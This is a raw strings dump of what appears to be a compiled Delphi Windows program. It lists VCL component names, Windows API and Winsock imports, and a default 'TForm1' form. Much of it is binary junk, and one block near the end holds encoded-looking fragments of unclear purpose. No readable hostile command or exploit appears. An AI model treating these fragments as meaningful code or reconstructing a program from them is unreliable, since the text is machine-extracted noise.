GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
IHelpSelector,
HelpIntfs
IHelpSystem,
HelpIntfs
ICustomHelpViewer,
HelpIntfs
IExtendedHelpViewer
HelpIntfs
ISpecialWinHelpViewer
HelpIntfs
IHelpManager,
HelpIntfs
EHelpSystemException
THelpViewerNode
THelpManager
UhZ/B
Uhq1B
R(FKu
Uh-3B
Uh#9B
_^[Y]
Uh=;B
SVhT=B
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
TSynchroObject
TCriticalSection
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
Uh9JB
UhqJB
UhQKB
IShellFolder,
ShlObj
Uh5LB
TCommonDialog
TCommonDialog
Dialogs
Ctl3D|
HelpContext
OnClose
OnShow
TOpenOption
ofReadOnly
ofOverwritePrompt
ofHideReadOnly
ofNoChangeDir
ofShowHelp
ofNoValidate
ofAllowMultiSelect
ofExtensionDifferent
ofPathMustExist
ofFileMustExist
ofCreatePrompt
ofShareAware
ofNoReadOnlyReturn
ofNoTestFileCreate
ofNoNetworkButton
ofNoLongNames
ofOldStyleDialog
ofNoDereferenceLinks
ofEnableIncludeNotify
ofEnableSizing
ofDontAddToRecent
ofForceShowHidden
Dialogs
TOpenOptions
TOpenOptionEx
ofExNoPlacesBar
Dialogs
TOpenOptionsEx
TOFNotifyEx
TIncludeItemEvent
TOFNotifyEx
Include
Boolean
TOpenDialog
TOpenDialoghPB
Dialogs
FileName
FilterT
FilterIndex
InitialDirHOB
Options
OptionsEx
Title
OnCanClose
OnFolderChange
OnSelectionChange
OnTypeChange
OnIncludeItemSVW
Uh6UB
_^[Y]
UhgVB
Uh9VB
_^[Y]
;Ght4
FileEditStyle
8Z|03
UhE^B
@\@t*U
u"Vh_
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
TTimer
ExtCtrls
Enabled
Interval
OnTimerSV
_^[Y]
s'h8jB
Delphi Picture
Delphi Component
UhXkB
MAPI32.DLL
UhDmB
Uh}mB
TConversion
TConversionFormat
TUDAlignButton
udLeft
udRight
ComCtrls
TUDOrientation
udHorizontal
udVertical
ComCtrls
TUDBtnType
btNext
btPrev
ComCtrls
TUpDownDirection
updNone
updUp
updDown
ComCtrls
TUDClickEvent
Sender
TObject
Button
TUDBtnType
TUDChangingEvent
Sender
TObject
AllowChange
Boolean
TUDChangingEventEx
Sender
TObject
AllowChange
Boolean
NewValue
Smallint
Direction
TUpDownDirection
TCustomUpDown
TCustomUpDownhpB
ComCtrls
TUpDown
TUpDown
ComCtrls
AlignButton
Anchorsl
Associate
ArrowKeys
Enabled
Hint<
Increment
ConstraintsTnB
Orientation
ParentShowHint
PopupMenu<
Position
ShowHintd
TabOrder
TabStop
Thousands
Visible
WrapToB
OnChanging
OnChangingExx
OnContextPopup
OnClick
OnEnter
OnExitP
OnMouseDown
OnMouseMoveP
OnMouseUp
THKModifier
hkShift
hkCtrl
hkAlt
hkExt
ComCtrls
THKModifiers
THKInvalidKey
hcNone
hcShift
hcCtrl
hcAlt
hcShiftCtrl
hcShiftAlt
hcCtrlAlt
hcShiftCtrlAlt
ComCtrls
THKInvalidKeys
TCustomHotKey
TCustomHotKey
ComCtrls
THotKey<zB
THotKeyhyB
ComCtrls
Anchors
AutoSize
BiDiMode
Constraints
Enabled
HotKey
InvalidKeys
Modifiers
ParentBiDiMode
ParentShowHint
PopupMenu
ShowHintd
TabOrder
TabStop
Visible
OnChangex
OnContextPopup
OnEnter
OnExitP
OnMouseDown
OnMouseMoveP
OnMouseUp
ECommonCalendarError
TMonthCalColorsd~B
TMonthCalColorsD~B
ComCtrls
BackColor0
TextColor0
TitleBackColor0
TitleTextColor0
MonthBackColor0
TrailingTextColor
TCalDayOfWeek
dowMonday
dowTuesday
dowWednesday
dowThursday
dowFriday
dowSaturday
dowSunday
dowLocaleDefault
ComCtrls
TOnGetMonthInfoEvent
Sender
TObject
Month
Cardinal
MonthBoldInfo
Cardinal
TCommonCalendar
TCommonCalendar
ComCtrls
EMonthCalError
TMonthCalendar
TMonthCalendar|
ComCtrls/
Align
Anchors
AutoSized
BorderWidth
BiDiMode`~B
CalColors
Constraints
MultiSelect
DragCursor0
DragKind
DragMode
Enabled
EndDate|
FirstDayOfWeek
ImeModeT
ImeName
MaxDateT
MaxSelectRange
MinDate
ParentBiDiMode
ParentFont
ParentShowHint
PopupMenu
ShowHint
ShowToday
ShowTodayCircled
TabOrder
TabStop
Visible
WeekNumbers
OnClickx
OnContextPopup
OnDblClick<
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnEnter
OnExit
OnGetMonthInfo,
OnKeyDownx
OnKeyPress,
OnKeyUp
OnStartDock
OnStartDrag
EDateTimeError
TDateTimeKind
dtkDate
dtkTime
ComCtrls
TDTDateMode
dmComboBox
dmUpDown
ComCtrls
TDTDateFormat
dfShort
dfLong
ComCtrls\
TDTCalAlignment
dtaLeft
dtaRight
ComCtrls
TDTParseInputEvent
Sender
TObject
UserString
String
DateAndTime
TDateTime
AllowChange
Boolean
TDateTimePicker
TDateTimePicker\
ComCtrls8
Anchors
BevelEdges
BevelInner
BevelOuter$
BevelKindh
BevelWidth
BiDiModeX
CalAlignment`~B
CalColors
Constraints
Format
ShowCheckbox
Checked0
Color
DateFormat
DateMode
DragCursor0
DragKind
DragMode
Enabled
ImeModeT
ImeName
MaxDate
MinDate
ParseInput
ParentBiDiMode
ParentColor
ParentFont
ParentShowHint
PopupMenu
ShowHintd
TabOrder
TabStop
Visible
OnClick
OnCloseUp
OnChangex
OnContextPopup
OnDropDown
OnDblClick<
OnDragDrop
OnDragOver
OnEndDock
OnEndDrag
OnEnter
OnExit,
OnKeyDownx
OnKeyPress,
OnKeyUp
OnStartDock
OnStartDrag
OnUserInput
comctl32.dll
msctls_updown32
F0;C0
TDBEdit
TDBMemo
_^[Y]
msctls_hotkey32
D$8PS
QQQQQQS
SysMonthCal32
SysDateTimePick32
TThemeServices
Theme manager
2001, 2002 Mike Lischke
^[YY]
!"#$%
THintAction
THintActionX
StdActns
TWinHelpViewer
_^[YY]
_^[YY]
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
_^[Y]
JumpID("","%s")
_^[YY]
_^[Y]
MS_WINHELP
#32770
TCursor
TAlign
alNone
alTop
alBottom
alLeft
alRight
alClient
alCustom
Controls
TDragObject
TDragObjectT
Controls
TBaseDragControlObject
TBaseDragControlObject
Controls
TDragControlObject
TDragControlObjectEx
TDragDockObject(
TDragDockObject
Controls
TDragDockObjectEx
TControlCanvas
TControlCanvas8
Controls
TControlActionLink
TMouseButton
mbLeft
mbRight
mbMiddle
Controls
TDragMode
dmManual
dmAutomatic
Controls
TDragState
dsDragEnter
dsDragLeave
dsDragMove
Controls
TDragKind
dkDrag
dkDock
Controls
TTabOrder
TCaption
TDate
TTime
TAnchorKind
akLeft
akTop
akRight
akBottom
Controls
TAnchors
TConstraintSize
TSizeConstraints
TSizeConstraintsl
Controls
MaxHeight
MaxWidth
MinHeight
MinWidth
TMouseEvent
Sender
TObject
Button
TMouseButton
Shift
TShiftState
Integer
Integer
TMouseMoveEvent
Sender
TObject
Shift
TShiftState
Integer
Integer
TKeyEvent
Sender
TObject
Shift
TShiftState
TKeyPressEvent
Sender
TObject
TDragOverEvent
Sender
TObject
Source
TObject
Integer
Integer
State
TDragState
Accept
Boolean
TDragDropEvent
Sender
TObject
Source
TObject
Integer
Integer
TStartDragEvent
Sender
TObject
DragObject
TDragObject
TEndDragEvent
Sender
TObject
Target
TObject
Integer
Integer
TDockDropEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
TDockOverEvent
Sender
TObject
Source
TDragDockObject
Integer
Integer
State
TDragState
Accept
Boolean
TUnDockEvent
Sender
TObject
Client
TControl
NewTarget
TWinControl
Allow
Boolean
TStartDockEvent
Sender
TObject
DragObject
TDragDockObject
TGetSiteInfoEvent
Sender
TObject
DockClient
TControl
InfluenceRect
TRect
MousePos
TPoint
CanDock
Boolean
TCanResizeEvent
Sender
TObject
NewWidth
Integer
NewHeight
Integer
Resize
Boolean
TConstrainedResizeEvent
Sender
TObject
MinWidth
Integer
MinHeight
Integer
MaxWidth
Integer
MaxHeight
Integer
TMouseWheelEvent
Sender
TObject
Shift
TShiftState
WheelDelta
Integer
MousePos
TPoint
Handled
Boolean
TMouseWheelUpDownEvent
Sender
TObject
Shift
TShiftState
MousePos
TPoint
Handled
Boolean
TContextPopupEvent
Sender
TObject
MousePos
TPoint
Handled
Boolean
TControl
TControl
Controls
LeftT
WidthT
Height
Cursor
HelpType
HelpKeyword|
HelpContext0
TWinControlActionLink
TImeMode
imDisable
imClose
imOpen
imDontCare
imSAlpha
imAlpha
imHira
imSKata
imKata
imChinese
imSHanguel
imHanguel
Controls
TImeName
TBorderWidth
TBevelCut
bvNone
bvLowered
bvRaised
bvSpace
Controls
TBevelEdge
beLeft
beTop
beRight
beBottom
Controls
TBevelEdges
TBevelKind
bkNone
bkTile
bkSoft
bkFlat
Controls
TBevelWidth
IDockManager,
Controls
TWinControl
TWinControl
Controls
TCustomControl
TCustomControl
Controls
THintWindow
THintWindow<
Controls
TDockZone
TDockTree
TMouse
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
TSiteList
_^[YY]
tPHt8
_^[Y]
S$_^[]
;B0t'
;B8t=
CQ tA
YZ_^[
YZ]_^[
YZ_^[
t%Jt?Jt[
%s (%s)
Z:Pjt
YZ]_^[
$:Cat
u$;~|u
;CLtX3
Qh_^[
YZ_^[
YZ_^[
V:P\t
GP t;
_^[YY]
CH+D$
CL+D$
;s0t=;
:_Wt+
f;Pxt
Uh6,C
KHQRP
UhW4C
UhK7C
Ht7Ht
Ph0=C
IsControl
_^[YY]
YZ_^[
UhBHC
_^[YY]
_^[Y]
8]_^[
,]_^[
YZ_^[
Uh,NC
^[YY]
Uh<PC
RD;PD
:_[up
SVWUQ
Z]_^[
C$PVj
C$_^[
:GauOFKu
_^[Y]
DesignSize
UhIdC
_^[YY]
_^[Y]
t2HtY
,;=0kF
]_^[
UhkxC
_^[Y]
_^[Y]
$Z_^[
_^[YY]
_^[Y]
Uh^}C
^[YY]
SVWUQ
Z]_^[
SVWUQ
Z]_^[
SVWUQ
Z]_^[
_^[YY]
;XDt#
SVWUQ
Z]_^[
t&j7j
YZ]_^[
YZ]_^[
YZ]_^[
t4VS
R|FOu
YZ]_^[
^[YY]
S8_^[]
+CH+E
+SL+U
_^[Y]
f;Pht
_^[Y]
t9;wlt4
YZ_^[
;Bdt*
;Bh|3
R|_^[
_^[Y]
Y_^[]
Y[YY]
t$;C8u
QQQQSVW
;Fdu;
^[YY]
Q8FKu
;Xdt>
t#;^dt
YZ_^[
Y_^[]
^[YY]
+W$;U
+G$;E
_^[Y]
BP_^[]
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
YZ_^[
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
TContainedAction
TContainedAction8
ActnList
Category
TCustomActionList
TCustomActionList\
ActnList
TShortCutList
TShortCutList8
ActnList
TCustomAction
TCustomActionT
ActnList
TActionLinkSV
^[YY]
u*;~8u
R0GNu
SVWUQ
Z]_^[
QLGNu
R0Z_^[
QPFOu
_^[Y]
$:Cjt_
QTGNu
R0Z_^[
Q`FOu
R0]_^[
$;Ctt?
Q\GNu
R0Z_^[
QhGNu
R0Z_^[
QlGNu
R0Z_^[
SVWQf
QpGNu
R0Z_^[
QtFOu
R0]_^[
SVWUQ
$Z]_^[
TChangeLink
TImageIndex
TCustomImageList
TCustomImageListH
ImgList
Rd_^[
s8VV3
S0_^[]
R ;C0|
R,;C4}!
S`]_^[
Bitmap
_^[Y]
comctl32.dll
comctl32.dll
ImageList_WriteEx
EMenuError
TMenuBreak
mbNone
mbBreak
mbBarBreak
Menus
TMenuChangeEvent
Sender
TObject
Source
TMenuItem
Rebuild
Boolean
TMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
ARect
TRect
Selected
Boolean
TAdvancedMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
ARect
TRect
State
TOwnerDrawState
TMenuMeasureItemEvent
Sender
TObject
ACanvas
TCanvas
Width
Integer
Height
Integer
TMenuItemAutoFlag
maAutomatic
maManual
maParent
Menus
TMenuAutoFlag
Menus
TMenuActionLink<
TMenuItem
TMenuItem<
Menus
Action
AutoCheck
AutoHotkeys
AutoLineReduction
Bitmap
Break
Caption
Checked
SubMenuImages
Default
Enabledl
GroupIndex|
HelpContext
ImageIndex
RadioItem
ShortCut
Visible
OnClickT
OnDrawItem
OnAdvancedDrawItem8
OnMeasureItem
TMenu
TMenu`
Menus
Items
TMainMenu
TMainMenuT
Menus
AutoHotkeys
AutoLineReduction
AutoMerge
BiDiMode
Images
OwnerDraw
ParentBiDiMode
OnChange
TPopupAlignment
paLeft
paRight
paCenter
Menus,
TTrackButton
tbRightButton
tbLeftButton
Menusl
TMenuAnimations
maLeftToRight
maRightToLeft
maTopToBottom
maBottomToTop
maNone
Menus
TMenuAnimation
TPopupMenu
TPopupMenu8
Menus
Alignment
AutoHotkeys
AutoLineReduction
AutoPopup
BiDiMode|
HelpContext
Images
MenuAnimation
OwnerDraw
ParentBiDiMode(
TrackButton
OnChange
OnPopup
TPopupList
TMenuItemStack
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
_^[YY]
f;B`t
Uho$D
CPPVj
Uhn%D
Q<]_^[
SVWUQ
:X?s&
X?ENu
Z]_^[
Sh$%D
ShortCutText
UhK.D
_^[Y]
UhW7D
_^[Y]
P?:S?u
:^8tB
:^9tg
Q<_^[
:^?t1
f;P`t
:]:tJ
Q<]_^[
@?:F?v
Q<]_^[
Q<_^[
W<CNu
6h4MD
SpFOu
$YZ]_^[
_^[Y]
_^[Y]
SVWUQ
Z]_^[
_^[YY]
Uhd\D
S0^[]
_^[Y]
_^[Y]
Ih;J4u
_^[Y]
Uh'hD
UhZfD
Uh=fD
UhxgD
Uh[gD
YZ]_^[
S0_^[
S<&uO
^[YY]
TScrollBarInc
TScrollBarStyle
ssRegular
ssFlat
ssHotTrack
FormsLoD
TControlScrollBar
TControlScrollBarLoD
Forms
ButtonSize0
Color
Increment
Margin
ParentColorT
PositionT
Range
SmoothT
StyleT
ThumbSize
Tracking
Visible
TWindowState
wsNormal
wsMinimized
wsMaximized
Forms
TScrollingWinControl
TScrollingWinControl
Forms
HorzScrollBarloD
VertScrollBarxsD
TFormBorderStyle
bsNone
bsSingle
bsSizeable
bsDialog
bsToolWindow
bsSizeToolWin
Forms
IDesignerHook
Forms
IOleForm,
Forms
TFormStyle
fsNormal
fsMDIChild
fsMDIForm
fsStayOnTop
Forms
TBorderIcon
biSystemMenu
biMinimize
biMaximize
biHelp
Forms
TBorderIcons
TPosition
poDesigned
poDefault
poDefaultPosOnly
poDefaultSizeOnly
poScreenCenter
poDesktopCenter
poMainFormCenter
poOwnerFormCenter
Forms
TDefaultMonitor
dmDesktop
dmPrimary
dmMainForm
dmActiveForm
Forms
TPrintScale
poNone
poProportional
poPrintToFit
Forms
TCloseAction
caNone
caHide
caFree
caMinimize
Forms
TCloseEvent
Sender
TObject
Action
TCloseAction
TCloseQueryEvent
Sender
TObject
CanClose
Boolean
TShortCutEvent
TWMKey
Handled
Boolean
THelpEvent
Command
Integer
CallHelp
Boolean
Boolean
TCustomForm
TCustomForm
Forms
TForm
TForm
FormsU
Actionl
ActiveControl
Align
AlphaBlendl
AlphaBlendValue
Anchors
AutoScroll
AutoSize
BiDiMode
BorderIconstsD
BorderStyled
BorderWidth|
CaptionT
ClientHeightT
ClientWidth0
Color
TransparentColor0
TransparentColorValue
Constraints
Ctl3D
UseDockManager
DefaultMonitor
DockSite0
DragKind
DragMode
Enabled
ParentFont
FormStyleT
Height
HelpFileloD
HorzScrollBar
KeyPreview
OldCreateOrder
ObjectMenuItem
ParentBiDiModeT
PixelsPerInch
PopupMenu
Position
PrintScale
Scaled
ScreenSnap
ShowHintT
SnapBufferloD
VertScrollBar
VisibleT
WidthTqD
WindowState
WindowMenu
OnActivate|
OnCanResize
OnClickxvD
OnClose
OnCloseQuery
OnConstrainedResizex
OnContextPopup
OnCreate
OnDblClick
OnDestroy
OnDockDrop
OnDockOver<
OnDragDrop
OnDragOver
OnEndDock
OnGetSiteInfo
OnHide<wD
OnHelp,
OnKeyDownx
OnKeyPress,
OnKeyUpP
OnMouseDown
OnMouseMoveP
OnMouseUp|
OnMouseWheel
OnMouseWheelDown
OnMouseWheelUp
OnPaint
OnResize
OnShortCut
OnShow
OnStartDock8
OnUnDock
TCustomDockForm
TCustomDockForm
Forms
PixelsPerInch
TMonitor
TScreen
TScreen
Forms
TApplication
TApplication
Forms
t:GNu
^[YY]
;S$t6
;S0t6
]_^[
_^[Y]
_^[Y]
PixelsPerInch
TextHeight
IgnoreFontProperty
_^[YY]
S,_^[]
SVWUQ
$Z]_^[
;Cpu'
F(Z_^[
MDICLIENT
_^[Y]
_^[Y]
;ADti
f#CTf
_^[Y]
_^[YY]
t"GNu
$Z_^[
_^[YY]
_^[Y]
Y_^[]
_^[Y]
_^[Y]
_^[YY]
Ch;Ctt
Cd;Cpt
C\_^[
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
f;sDtsf
PWj W
CHYZ]_^[
RD;PD
_^[YY]
TApplication
MAINICON
XD;PHu
sx;P`u
;B0uGj
_^[YY]
vcltest3.dll
RegisterAutomation
SVWUQ
$Z]_^[
~D_^[Y]
_^[Y]
Uh] E
Uh+!E
_^[Y]
Uhp#E
_^[Y]
;{HtK
YZ_^[
Uhk%E
Y_^[Y]
;^`u0
]_^[
UhW+E
^[YY]
Uh*0E
YZ]_^[
Shx1E
User32.dll
SetLayeredWindowAttributes
Uh32E
TaskbarCreated
EIdException
EIdInvalidServiceName
EIdSocketError
EIdWS2StubError
WhD7E
WSACleanup
accept
closesocket
connect
ioctlsocket
getpeername
getsockname
getsockopt
htonl
htons
inet_addr
inet_ntoa
listen
ntohl
ntohs
recvfrom
select
sendto
setsockopt
shutdown
socket
gethostbyaddr
gethostbyname
gethostname
getservbyport
getservbyname
getprotobynumber
getprotobyname
WSASetLastError
WSAGetLastError
WSAIsBlocking
WSAUnhookBlockingHook
WSASetBlockingHook
WSACancelBlockingCall
WSAAsyncGetServByName
WSAAsyncGetServByPort
WSAAsyncGetProtoByName
WSAAsyncGetProtoByNumber
WSAAsyncGetHostByName
WSAAsyncGetHostByAddr
WSACancelAsyncRequest
WSAAsyncSelect
__WSAFDIsSet
WSAAccept
WSACloseEvent
WSAConnect
WSACreateEvent
WSADuplicateSocketA
WSADuplicateSocketW
WSAEnumNetworkEvents
WSAEnumProtocolsA
WSAEnumProtocolsW
WSAEventSelect
WSAGetOverlappedResult
WSAGetQosByName
WSAHtonl
WSAHtons
WSAIoctl
WSAJoinLeaf
WSANtohl
WSANtohs
WSARecv
WSARecvDisconnect
WSARecvFrom
WSAResetEvent
WSASend
WSASendDisconnect
WSASendTo
WSASetEvent
WSASocketA
WSASocketW
WSAWaitForMultipleEvents
WSAAddressToStringA
WSAAddressToStringW
WSAStringToAddressA
WSAStringToAddressW
WSALookupServiceBeginA
WSALookupServiceBeginW
WSALookupServiceNextA
WSALookupServiceNextW
WSALookupServiceEnd
WSAInstallServiceClassA
WSAInstallServiceClassW
WSARemoveServiceClass
WSAGetServiceClassInfoA
WSAGetServiceClassInfoW
WSAEnumNameSpaceProvidersA
WSAEnumNameSpaceProvidersW
WSAGetServiceClassNameByClassIdA
WSAGetServiceClassNameByClassIdW
WSASetServiceA
WSASetServiceW
WSAProviderConfigChange
TransmitFile
AcceptEx
GetAcceptExSockaddrs
WSARecvEx
uAhm'
WS2_32.DLL
WS2_32.DLL
WSAStartup
UhEGE
TIdSocketList
TIdStack
EIdStackError
EIdStackInitializationFailed
EIdStackSetSizeExceededj
Uh0OE
UheOE
TIdSocketListWindows
TIdStackWindowsU
UhjQE
UhLRE
S|Z_^[
Uh[UE
Uh=VE
Uh9YE
IdStackWindows
QQQQSVW
UhiZE
Uh.ZE
Uh.[E
Uh6^E
Uh*_E
UhU`E
IdGlobal
IdGlobal
UhGcE
_^[Y]
FALSE
TIdBaseComponent
TIdBaseComponent4gE
IdBaseComponent
UhGhE
UhTiE
UhUjE
Uh5kE
UhmkE
UhMlE
TIdThreadMgr
TIdThreadMgrTmE
IdThreadMgr
EIdThreadMgrError
EIdThreadClassNotSpecified
UhOoE
TIdThreadMgrPool
TIdThreadMgrPool
IdThreadMgrPool
PoolSize
UhuqE
_^[YY]
UhvsE
DateTimePicker1
MonthCalendar1
HotKey1
UpDown1
IdThreadMgrPool1
OpenDialog1
TForm1
TForm1
Unit1
Uh)wE
ELF.EX
GetSystemTimeAsFileTime
kernel32
FileTimeToSystemTime
Error
Runtime error at 00000000
0123456789ABCDEF
MS Sans Serif
KVMK.E
E5t Hv.E
EQMMXe.E
E)Xjdf`E
MEYjif`M
Yjgf`M
M%Yjcf`M
Xjrf`E
Xjif.
jeXf.
|Qgj.
{=#W.
h&cj.
Xj.f`E
jf_f`}
_jBf`}
}_jM_f`}
}}_jxZ
UsZjuf`U
3)jtf
VVVd
j\Xf`E
Xjvf`E
Xjaf`E
Yjtf`M
M;Yjtf`M
Xjpf`E
MKVf.E
EUMMXe.E
EGXjx
UWjdZf`U
Zjbf`U
Xjnf`
Xjof`
Xjtf`
Xjef`
Xjpf`
Xjaf`
Xjdf`
Xj.f`
jxf`E
VMKV.E
Xjpf`E
Xjbf`E
/b .E
yf9K"
dll..E
Xj2f`E
Xj%f`E
jDf`E
.(Y9E
FPP`E
U?Zj f`U
U5Zj f`U
YjXf`E
Yjxf`M
Yjlf`M
M=Yjrf`E
VVVd
Xjef`E
Xjif`E
RW`FT
eW`F
h&cj~W
YYf;8
Y3 9]
%P;SV
fYXSV
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WriteFile
WaitForSingleObjectEx
WaitForSingleObject
VirtualQuery
VirtualAlloc
Sleep
SizeofResource
SetThreadPriority
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetTempPathA
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileSize
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CopyFileA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
RectVisible
RealizePalette
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetTextMetricsA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
ExcludeClipRect
DeleteObject
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OffsetRect
OemToCharA
MessageBoxA
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDlgItem
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
